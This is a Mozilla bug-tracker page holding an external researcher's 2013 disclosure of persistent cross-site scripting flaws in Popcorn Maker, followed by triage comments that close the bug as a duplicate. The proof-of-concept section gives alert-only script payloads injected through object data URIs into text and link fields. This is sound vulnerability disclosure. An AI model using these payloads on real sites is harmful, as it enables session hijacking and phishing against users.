Closed
Bug 881697
Opened 12 years ago
Closed 12 years ago
Multiple Persistent Vulnerabilities
Categories
(Webmaker Graveyard :: Popcorn Maker, defect)
Webmaker Graveyard
Popcorn Maker
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 866026
People
(Reporter: curtisk, Assigned: mgoodwin)
Details
(Keywords: reporter-external, Whiteboard: [site:popcorn.webmaker.org][wsec-xss])
Attachments
(5 files)
Date: Mon, 10 Jun 2013 20:28:04 +0100
From: Vulnerability Lab <admin@vulnerability-lab.com>
To: Mozilla Security <security@mozilla.org>
Subject: Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities
-----//-----
Title:
======
Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities
Date:
=====
2013-06-10
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=966
VL-ID:
=====
966
Common Vulnerability Scoring System:
====================================
3.2
Introduction:
=============
Popcorn adds interactivity and context to online video, pulling the rest
of the web right into the action in real time.
Popcorn lets users link social media, news feeds, data visualizations
and other content directly to moving images.
The result is a new form of multimedia storytelling that lives and
breathes more like the web itself: interactive, social,
and unique each time. Popcorn is the result of ongoing collaboration
between filmmakers, developers and webmakers. Together
we explore how modern browser technologies like HTML5 can reshape moving
images online.
Popcorn Maker makes it easy to enhance, remix and share web video. Use
your web browser to combine video and audio
with content from the rest of the web — from text, links and maps to
pictures and live feeds.
(Copy of the Homepage: https://popcorn.webmaker.org &
https://mozillalabs.com/en-US/Popcorn/ )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple
persistent web vulnerabilities in the Mozilla Popcorn Maker (Webmaker)
Application.
Report-Timeline:
================
2013-06-06: Researcher Notification & Coordination
2013-06-10: Vendor Notification
2013-00-00: Vendor Response/Feedback
2013-00-00: Vendor Fix/Patch
2013-00-00: Public Disclosure
Status:
========
Unpublished
Affected Products:
==================
Mozilla
Product: Popcorn Maker (Webmaker) 2013 Q2
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple persistent input validation web vulnerabilities are detected in
the official Mozilla Popcorn Maker (WebMaker) Web Application.
The vulnerability allows an attacker to inject own malicious script code
in the vulnerable module on application side (persistent).
The persistent input validation vulnerabilities are located in the
events und layer modules when processing to add `Text`, `Link URL`,
`Image URL`, `video-container name` with malicious persistent script
code (js/html). The script code will be executed when the website
is processing to load the malicious manipulated web context of the input
ago.
Exploitation of the vulnerabilities requires no privileged application
user account but low or medium required user interaction.
Successful exploitation results in persistent session hijacking of
mozilla accounts, persistent phishing, persistent external malware loads
or redirects and persistent module web context manipulation.
Vulnerable Service(s):
[+] Mozilla Corp - Popcorn Maker (Webmaker.org - Mozilla Labs)
Vulnerable Module(s):
[+] Events
[+] Layer
Vulnerable Parameter(s):
[+] Text
[+] Link URL
[+] Image URL
[+] Video Container Name
Affected Section(s):
[+] Index Basic - Listing
Proof of Concept:
=================
The persistent input validation web vulnerabilities can be exploited by
remote attackers without privilege application user account
with low or medium required user interaction. For demonstration or
reproduce ...
--- Vulnerable Application Modules & Input Fields ---
Module: Events > Text
Input Fields: Text & Link URL
Module: Events > Image
Input Fields: Image URL & Link URL
Module: Events > Popup
Input Fields: Text & Link URL
Module: Layer > Listing
Input Fields: video-container name
Reference(s):
https://popcorn.webmaker.org/templates/basic/
Payload:
<object data="data:text/html,<script>alert(1337)</script>"></object>--benDE
PoC: Property-name (Text) & Link URL
<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value"><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(1337)</script>"></object></textarea>
<div style="top: 105%; left: 50%;" class="butter-tooltip
shift-enter-tooltip-1370021564314 tooltip-no-hover">
Press Shift+Enter for a new line.</div></fieldset><fieldset
style="position: relative;" class="trackevent-property default input">
<label class="property-name">Link URL</label>
<input value="<object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="
data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)
</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="
data:text/html,<script>alert(1337)</script>"></object>"
data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip
text-link-tooltip1370021564317
tooltip-no-hover">Links will be clickable when shared.</div></fieldset>
PoC: trackevent-property textarea - POP!
<fieldset style="position: relative;" class="trackevent-property textarea">
<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">Pop! <object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(1337)</script>"></object></textarea>
PoC: linkUrl & text
<label class="property-name">Link URL</label>
<input value="<object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="
data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)
</script>"></object><object
data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object><object
data="data:
text/html,<script>alert(1337)</script>"></object>"
data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip
text-link-tooltip1370021564317
tooltip-no-hover">Links will be clickable when shared.</div></fieldset>
Solution:
=========
Restrict the input fields with a secure char filter and parse the input
and output listing in the application.
Risk:
=====
The security risk of the persistent input validation web vulnerabilities
are estimated as medium.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any
vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com -
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or
support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com
![]() |
Reporter | |
Comment 1•12 years ago
|
||
![]() |
Reporter | |
Comment 2•12 years ago
|
||
![]() |
Reporter | |
Comment 3•12 years ago
|
||
![]() |
Reporter | |
Comment 4•12 years ago
|
||
![]() |
Reporter | |
Comment 5•12 years ago
|
||
![]() |
Reporter | |
Comment 6•12 years ago
|
||
assigned to mgoodwin for verification
https://wiki.mozilla.org/Security/Web_Bug_Rotation#Web_Bug_Verification
Assignee: nobody → mgoodwin
Assignee | ||
Updated•12 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Whiteboard: [reporter-external][verif?] → [site:popcorn.webmaker.org][wsec-xss]
Comment 8•12 years ago
|
||
Hello Mark Goodwin,
the issue has been marked as duplicate in our database after you provided the details. The issue will be deleted from our upcomings and ensure the real researcher get the full credits for reporting the issue.
Thanks Mark. We appreciate your cooperation and web vulnerability coordination.
~Benjamin Kunz Mejri
Updated•11 years ago
|
Group: websites-security
Flags: sec-bounty-
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•